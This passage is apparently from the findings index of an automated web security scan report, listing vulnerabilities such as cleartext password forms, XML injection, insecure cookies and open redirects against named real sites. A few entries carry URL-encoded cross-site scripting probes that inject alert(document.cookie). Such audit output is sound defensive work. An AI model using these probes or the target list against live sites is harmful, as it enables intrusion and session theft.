5.79. http://www.livejournal.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.de.doubleclick.net/clientaccesspolicy.xml

6.3. http://ad.doubleclick.net/clientaccesspolicy.xml

6.4. http://b.voicefive.com/clientaccesspolicy.xml

6.5. http://clk.redcated/clientaccesspolicy.xml

6.6. http://enterprisemediagroup.112.2o7.net/clientaccesspolicy.xml

6.7. http://metrics.blackberry.com/clientaccesspolicy.xml

6.8. http://msdn.microsoft.com/clientaccesspolicy.xml

6.9. http://spe.redcated/clientaccesspolicy.xml

6.10. http://www91.intel.com/clientaccesspolicy.xml

6.11. http://ziffdavisbaseline.112.2o7.net/clientaccesspolicy.xml

6.12. http://d.ligatus.com/clientaccesspolicy.xml

6.13. http://officedepot.shoplocal.com/clientaccesspolicy.xml

6.14. http://www.microsoft.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://channelmarketing.owneriq.com/rmb-account/login-page

7.2. http://dailyme.com/

7.3. http://digg.com/submit

7.4. http://fussballmania.com/

7.5. http://hhonors1.hilton.com/en_US/hh/home_index.do

7.6. http://hhonors1.hilton.com/en_US/hh/home_index.do

7.7. http://malsup.com/jquery/form/

7.8. http://malsup.com/jquery/form/

7.9. http://malsup.com/jquery/form/

7.10. http://malsup.com/jquery/form/

7.11. http://malsup.com/jquery/form/

7.12. http://malsup.com/jquery/form/

7.13. http://multiply.com/

7.14. http://multiply.com/

7.15. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

7.16. http://tipd.com/

7.17. http://tipd.com/

7.18. http://tipd.com/register

7.19. http://tipd.com/register

7.20. http://unalog.com/

7.21. http://vodpod.com/

7.22. http://www.arto.com/

7.23. http://www.bibsonomy.org/

7.24. http://www.coe.gatech.edu/

7.25. http://www.connotea.org/

7.26. http://www.efort.org/

7.27. http://www.facebook.com/

7.28. http://www.jamespot.com/

7.29. http://www.jazdtech.com/techdirect/

7.30. http://www.jumptags.com/

7.31. http://www.kledy.co.uk/

7.32. http://www.kledy.de/

7.33. http://www.kledy.de/bookmarks.php

7.34. http://www.kledy.de/bookmarks.php/

7.35. http://www.kledy.de/buttons.php

7.36. http://www.kledy.de/groups.php

7.37. http://www.kledy.de/impressum.php

7.38. http://www.kledy.de/login.php

7.39. http://www.kledy.de/login.php

7.40. http://www.kledy.de/topusers.php

7.41. http://www.kledy.es/

7.42. http://www.kledy.eu/

7.43. http://www.kledy.it/

7.44. http://www.kledy.us/

7.45. http://www.klivio.com/

7.46. http://www.klivio.de/

7.47. http://www.linkagogo.com/

7.48. http://www.linkatopia.com/

7.49. http://www.migrationexpertzone.com/

7.50. http://www.myfitnesspal.com/nutrition-facts-calories/bjs

7.51. http://www.mylinkvault.com/

7.52. http://www.nmworkwear.de/

7.53. http://www.nmworkwear.de/index.php

7.54. http://www.nowpublic.com/

7.55. http://www.ortho.hyperguides.com/

7.56. http://www.ota.org/members_only/login_menu.cfm

7.57. http://www.pdfforge.org/

7.58. http://www.peppernews.eu/

7.59. http://www.reddit.com/

7.60. http://www.reddit.com/

7.61. http://www.reddit.com/

7.62. http://www.shoppinga.de/

7.63. http://www.sitejot.com/

7.64. http://www.spiele365.com/

7.65. http://www.squidoo.com/

7.66. http://www.squidoo.com/

7.67. http://www.stumbleupon.com/

7.68. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

7.69. http://www.technotizie.it/

7.70. http://www.technotizie.it/

7.71. http://www.tumblr.com/

7.72. http://www.tumblr.com/

7.73. http://www.yigg.de/

7.74. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

7.75. http://www1.hilton.com/en_US/hi/index.do

7.76. http://www1.hilton.com/en_US/hi/index.do

8. XML injection

8.1. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php [REST URL parameter 1]

8.2. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]

8.3. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

8.4. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 1]

8.5. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 2]

8.6. http://amch.questionmarket.com/kcontent/478/ktag.js [REST URL parameter 3]

8.7. http://api.tweetmeme.com/button.js [REST URL parameter 1]

8.8. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 1]

8.9. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 2]

8.10. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 3]

8.11. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 4]

8.12. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/assets/300x250.swf [REST URL parameter 5]

8.13. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 1]

8.14. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 2]

8.15. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 3]

8.16. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 4]

8.17. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf [REST URL parameter 5]

8.18. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 1]

8.19. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 2]

8.20. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 3]

8.21. http://cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf [REST URL parameter 4]

8.22. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 1]

8.23. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 2]

8.24. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 3]

8.25. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 4]

8.26. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 5]

8.27. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js [REST URL parameter 6]

8.28. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 1]

8.29. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 2]

8.30. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 3]

8.31. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 4]

8.32. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 5]

8.33. http://coverall.splunk.com/themes/splunk_com/scripts/js/contrib/Myriad_Pro_Semibold_600.font.js [REST URL parameter 6]

8.34. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 1]

8.35. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 2]

8.36. http://coverall.splunk.com/web_assets/v5/homepage [REST URL parameter 3]

8.37. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 1]

8.38. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 2]

8.39. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 3]

8.40. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.css [REST URL parameter 4]

8.41. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 1]

8.42. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 2]

8.43. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 3]

8.44. http://coverall.splunk.com/web_assets/v5/homepage/homepage.hero.js [REST URL parameter 4]

8.45. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 1]

8.46. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 2]

8.47. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 3]

8.48. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css [REST URL parameter 4]

8.49. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 1]

8.50. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 2]

8.51. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 3]

8.52. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css [REST URL parameter 4]

8.53. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 1]

8.54. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 2]

8.55. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/favicon16.ico [REST URL parameter 3]

8.56. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 1]

8.57. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 2]

8.58. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 3]

8.59. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 4]

8.60. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js [REST URL parameter 5]

8.61. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 1]

8.62. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 2]

8.63. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 3]

8.64. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 4]

8.65. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js [REST URL parameter 5]

8.66. http://edge.quantserve.com/quant.js [REST URL parameter 1]

8.67. http://load.exelator.com/load/ [REST URL parameter 1]

8.68. http://platform.twitter.com/widgets.js [REST URL parameter 1]

8.69. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.70. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.71. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.72. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.73. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]

8.74. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]

8.75. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]

8.76. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]

8.77. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 1]

8.78. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 2]

8.79. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 3]

8.80. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 4]

8.81. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9642.js [REST URL parameter 5]

8.82. http://splunkbase.splunk.com/apps/All/4.x/ [sort parameter]

8.83. http://tools.ietf.org/html/rfc2234] [REST URL parameter 1]

8.84. http://tools.ietf.org/html/rfc3492 [REST URL parameter 1]

8.85. http://tools.ietf.org/html/rfc3986 [REST URL parameter 1]

8.86. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 1]

8.87. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 2]

8.88. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 1]

8.89. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 2]

8.90. http://www.nmworkwear.de/index.php [REST URL parameter 1]

8.91. http://www.peppernews.eu/favicon.ico [REST URL parameter 1]

8.92. http://www.traffictrack.de/tracking/mpr.php [REST URL parameter 1]

8.93. http://www.traffictrack.de/tracking/mpr.php [REST URL parameter 2]

9. SSL cookie without secure flag set

9.1. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

9.2. https://ebus.ota.org/default.aspx

9.3. https://online.americanexpress.com/myca/logon/us/action

9.4. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

9.5. https://splunk.webex.com/mw0305l/mywebex/default.do

9.6. https://www.blackberry.com/profile/

9.7. https://www.box.net/

9.8. https://www.slackinc.com/reprints/order.asp

9.9. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

9.10. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

9.11. https://www201.americanexpress.com/MobileWeb/index.jsp

9.12. https://www209.americanexpress.com/merchant/marketing-data/pages/home

9.13. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

9.14. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

9.15. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

9.16. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

9.17. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

9.18. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

9.19. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

9.20. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

9.21. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

9.22. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

9.23. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

9.24. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

9.25. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

9.26. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

9.27. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

9.28. https://www257.americanexpress.com/openhome/smallbusiness.do

9.29. https://www295.americanexpress.com/entertainmentaccess/home.do

9.30. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

9.31. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

9.32. https://axptravel.americanexpress.com/consumertravel/travel.do

9.33. https://home.americanexpress.com/home/corporations.shtml

9.34. https://home.americanexpress.com/home/global_splash.html

9.35. https://home.americanexpress.com/home/mt_personal.shtml

9.36. https://lct.salesforce.com/

9.37. https://online.americanexpress.com/myca/acctsumm/us/action

9.38. https://sb.voicefive.com/b

9.39. https://www.americanexpress.com/airlines-credit-card/

9.40. https://www.americanexpress.com/credit-card-rewards/

9.41. https://www.americanexpress.com/gift/giftcardslanding.shtml

9.42. https://www.americanexpress.com/gold-card/

9.43. https://www.americanexpress.com/no-annual-fee-credit-cards/

9.44. https://www.blackberry.com/partnerzone/Forward.action

9.45. https://www.blackberry.com/partnerzone/Login.action

9.46. https://www.openforum.com/

9.47. https://www.xing.com/

9.48. https://www134.americanexpress.com/consumertravel/travel.do

9.49. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

9.50. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do

9.51. https://www217.americanexpress.com/cards/home.do

9.52. https://www217.americanexpress.com/cards/shopping/index.jsp

10. Session token in URL

10.1. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/frontpage.css

10.2. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/css/main.css

10.3. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/frontpage.js

10.4. http://d3g75t6gdfoqd0.cloudfront.net/version/7.01/js/min/main.js

10.5. http://feedburner.google.com/fb/a/mailverify

10.6. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

10.7. http://hhonors1.hilton.com/en_US/hh/home_index.do

10.8. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

10.9. http://homeappliance.manualsonline.com/regman/login/loginForm

10.10. http://homeappliance.manualsonline.com/regman/user/getUserBlock

10.11. http://homeappliance.manualsonline.com/regman/user/validateUser

10.12. http://session.owneriq.net/regman/mem/initsession

10.13. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

10.14. http://tools.cisco.com/search/display

10.15. https://www.aeprepaid.com/index.cfm

10.16. http://www.amazon.com/

10.17. http://www.csc.gatech.edu/~copeland/6612/tool-links.html

10.18. http://www.linkedin.com/companies/222438/OwnerIQ

10.19. http://www.mittelstandsblog.de/

10.20. http://www.officedepot.com/

10.21. http://www.officedepot.com/promo/list5.do

10.22. http://www.oneview.de/

10.23. http://www.quantcast.com/p-bdv9UMaVrliL2

10.24. http://www.splunk.com/page/company_news

10.25. http://www.usbjd.org/

10.26. http://www.yasni.de/

10.27. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

10.28. http://www1.hilton.com/en_US/hi/index.do

10.29. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

11. Password field submitted using GET method

11.1. http://channelmarketing.owneriq.com/rmb-account/login-page

11.2. http://digg.com/submit

11.3. http://www.jazdtech.com/techdirect/

11.4. http://www.squidoo.com/

11.5. http://www.technotizie.it/

12. ASP.NET ViewState without MAC enabled

12.1. https://ebus.ota.org/default.aspx

12.2. http://www.twiddla.com/

13. Open redirection

13.1. http://ad.zanox.com/tpv/ [14786739C435671106&ULP parameter]

13.2. http://mm.chitika.net/track [target parameter]

13.3. http://www.linuxsecurity.com/ads/adclick.php [Referer HTTP header]

13.4. http://www.splunk.com/index.php/sso_checker [Referer HTTP header]

14. Cookie scoped to parent domain

14.1. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

14.2. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

14.3. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

14.4. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

14.5. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

14.6. http://homeappliance.manualsonline.com/managemystuff.html

14.7. http://homeappliance.manualsonline.com/proxy.class.php

14.8. http://homeappliance.manualsonline.com/regman/login/loginForm

14.9. http://homeappliance.manualsonline.com/regman/user/getUserBlock

14.10. http://homeappliance.manualsonline.com/regman/user/validateUser

14.11. http://session.owneriq.net/regman/mem/initsession

14.12. http://software.intel.com/en-us/articles/intel-cloud-builders/

14.13. http://software.intel.com/sites/oss/

14.14. http://t.mookie1.com/t/v1/clk

14.15. http://www.amazon.com/

14.16. http://www.bebo.com/

14.17. https://www.box.net/

14.18. http://www.coe.gatech.edu/

14.19. http://www.diigo.com/

14.20. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

14.21. http://www.gpg.org/

14.22. http://www.hyves.nl/

14.23. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

14.24. http://www.manualsonline.com/privacy.html

14.25. http://www.manualsonline.com/tc.html

14.26. http://www.mylinkvault.com/

14.27. http://www.myspace.com/

14.28. http://www.oit.gatech.edu/content/information-security/

14.29. http://www.oit.gatech.edu/service/software-distribution/software-distribution

14.30. http://www.opensource.org/licenses

14.31. http://www.opensource.org/licenses/gpl-license.php

14.32. http://www.opensource.org/licenses/mit-license.php

14.33. http://www.pdfforge.org/

14.34. http://www.pusha.se/

14.35. http://www.stumbleupon.com/

14.36. http://www.sulit.com.ph/index.php/view

14.37. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

14.38. http://www.webnews.de/

14.39. http://a.rfihub.com/ca.gif

14.40. http://a.tribalfusion.com/i.cid

14.41. http://a.tribalfusion.com/j.ad

14.42. http://action.media6degrees.com/orbserv/hbpix

14.43. http://ad.doubleclick.net/click

14.44. http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html

14.45. http://ad.doubleclick.net/clk

14.46. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11

14.47. http://ad.zanox.com/tpv/

14.48. http://adclick.g.doubleclick.net/aclk

14.49. http://ak1.abmr.net/is/us.blackberry.com

14.50. http://altfarm.mediaplex.com/ad/ck/14302-119028-23636-2

14.51. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

14.52. http://altfarm.mediaplex.com/ad/js/14302-119028-23636-2

14.53. http://altfarm.mediaplex.com/ad/nc/14302-119028-23636-2

14.54. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php

14.55. http://ar.voicefive.com/b/wc_beacon.pli

14.56. http://ar.voicefive.com/bmx3/broker.pli

14.57. https://axptravel.americanexpress.com/consumertravel/travel.do

14.58. http://b.scorecardresearch.com/b

14.59. http://b.scorecardresearch.com/p

14.60. http://b.voicefive.com/b

14.61. http://baselinemag.us.intellitxt.com/al.asp

14.62. http://baselinemag.us.intellitxt.com/intellitxt/front.asp

14.63. http://blogs.splunk.com/

14.64. http://bookmarks.yahoo.com/

14.65. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

14.66. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.68. http://buzz.yahoo.com/

14.69. http://buzzport.gatech.edu/

14.70. http://c03.adsummos.net/a/e/d1.ads

14.71. http://c03.adsummos.net/a/e/s21719

14.72. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

14.73. http://clk.redcated/229/go/253329229/direct

14.74. http://clk.redcated/MRT/go/258547606/direct/01/

14.75. http://clk.redcated/MRT/go/264255445/direct

14.76. http://clk.redcated/MRT/go/267859374/direct

14.77. http://clk.redcated/go/264255445/direct

14.78. http://clk.redcated/go/267859374/direct

14.79. http://corp.americanexpress.com/gcs/cards/

14.80. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

14.81. http://corp.americanexpress.com/gcs/travel/us/

14.82. http://counter.yadro.ru/hit

14.83. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/

14.84. http://del.icio.us/post

14.85. http://developer.yahoo.com/yui/

14.86. http://developer.yahoo.com/yui/license.html

14.87. http://developers.facebook.com/plugins/

14.88. http://download32.us.intellitxt.com/al.asp

14.89. http://download32.us.intellitxt.com/intellitxt/front.asp

14.90. http://eas.statcamp.net/eas

14.91. http://edge.quantserve.com/quant.js

14.92. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

14.93. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577

14.94. http://feedburner.google.com/fb/a/mailverify

14.95. http://fusion.google.com/add

14.96. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

14.97. http://hhonors1.hilton.com/en_US/hh/home_index.do

14.98. https://home.americanexpress.com/home/corporations.shtml

14.99. https://home.americanexpress.com/home/global_splash.html

14.100. https://home.americanexpress.com/home/mt_personal.shtml

14.101. http://i.w55c.net/rs

14.102. http://ib.adnxs.com/px

14.103. http://ib.adnxs.com/seg

14.104. http://ib.adnxs.com/setuid

14.105. http://idcs.interclick.com/Segment.aspx

14.106. http://idpix.media6degrees.com/orbserv/hbpix

14.107. http://imp.constantcontact.com/imp/cmp.jsp

14.108. http://leadback.advertising.com/adcedge/lb

14.109. http://load.exelator.com/load/

14.110. http://map.media6degrees.com/orbserv/hbpix

14.111. http://messenger.yahoo.com/

14.112. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

14.113. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp

14.114. http://mm.chitika.net/minimall

14.115. http://mm.chitika.net/track

14.116. http://msdn.microsoft.com/en-us/library/ms537509(VS.85

14.117. http://myweb2.search.yahoo.com/myresults/bookmarklet

14.118. https://online.americanexpress.com/myca/acctsumm/us/action

14.119. https://online.americanexpress.com/myca/logon/us/action

14.120. http://orthoinfo.aaos.org/

14.121. http://pixel.33across.com/ps/

14.122. http://pixel.intellitxt.com/pixel.jsp

14.123. http://pixel.quantserve.com/pixel

14.124. http://px.owneriq.net/cm

14.125. http://px.owneriq.net/oxcm

14.126. http://px.owneriq.net/p

14.127. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

14.128. http://rt32.infolinks.com/action/doq.htm

14.129. http://rt82.infolinks.com/action/doq.htm

14.130. http://rt83.infolinks.com/action/doq.htm

14.131. https://sb.voicefive.com/b

14.132. http://segment-pixel.invitemedia.com/pixel

14.133. http://splunkbase.splunk.com/

14.134. http://tags.bluekai.com/site/2956

14.135. http://tools.cisco.com/search/display

14.136. http://track2.mybloglog.com/js/jsserv.php

14.137. http://us.blackberry.com/assets_refresh/images/dropNavArrow.png

14.138. http://vegetarian.about.com/od/soupsstewsandchili/r/hotandsour.htm

14.139. http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads

14.140. https://www.americanexpress.com/airlines-credit-card/

14.141. https://www.americanexpress.com/credit-card-rewards/

14.142. https://www.americanexpress.com/gift/giftcardslanding.shtml

14.143. https://www.americanexpress.com/gold-card/

14.144. https://www.americanexpress.com/no-annual-fee-credit-cards/

14.145. http://www.au2m8.com/v/

14.146. http://www.au2m8.com/v/

14.147. http://www.au2m8.com/v/

14.148. http://www.au2m8.com/v/

14.149. http://www.au2m8.com/v/

14.150. http://www.au2m8.com/v/

14.151. http://www.au2m8.com/v/

14.152. http://www.au2m8.com/v/

14.153. http://www.au2m8.com/v/

14.154. http://www.au2m8.com/v/

14.155. http://www.au2m8.com/v/

14.156. http://www.au2m8.com/v/

14.157. http://www.au2m8.com/v/

14.158. http://www.au2m8.com/v/

14.159. http://www.au2m8.com/v/

14.160. http://www.au2m8.com/v/

14.161. http://www.au2m8.com/v/

14.162. http://www.au2m8.com/v/

14.163. http://www.au2m8.com/v/

14.164. http://www.au2m8.com/v/

14.165. http://www.au2m8.com/v/

14.166. http://www.au2m8.com/v/

14.167. http://www.au2m8.com/v/

14.168. http://www.au2m8.com/v/

14.169. http://www.au2m8.com/v/

14.170. http://www.au2m8.com/v/

14.171. http://www.au2m8.com/v/

14.172. http://www.au2m8.com/v/

14.173. http://www.au2m8.com/v/

14.174. http://www.au2m8.com/v/

14.175. http://www.au2m8.com/v/

14.176. http://www.au2m8.com/v/

14.177. http://www.au2m8.com/v/

14.178. http://www.au2m8.com/v/

14.179. http://www.au2m8.com/v/

14.180. http://www.au2m8.com/v/

14.181. http://www.au2m8.com/v/

14.182. http://www.au2m8.com/v/

14.183. http://www.au2m8.com/v/

14.184. http://www.au2m8.com/v/

14.185. http://www.au2m8.com/v/

14.186. http://www.au2m8.com/v/

14.187. http://www.au2m8.com/v/

14.188. http://www.au2m8.com/v/

14.189. http://www.au2m8.com/v/

14.190. http://www.au2m8.com/v/

14.191. http://www.au2m8.com/v/

14.192. http://www.au2m8.com/v/

14.193. http://www.au2m8.com/v/

14.194. http://www.au2m8.com/v/

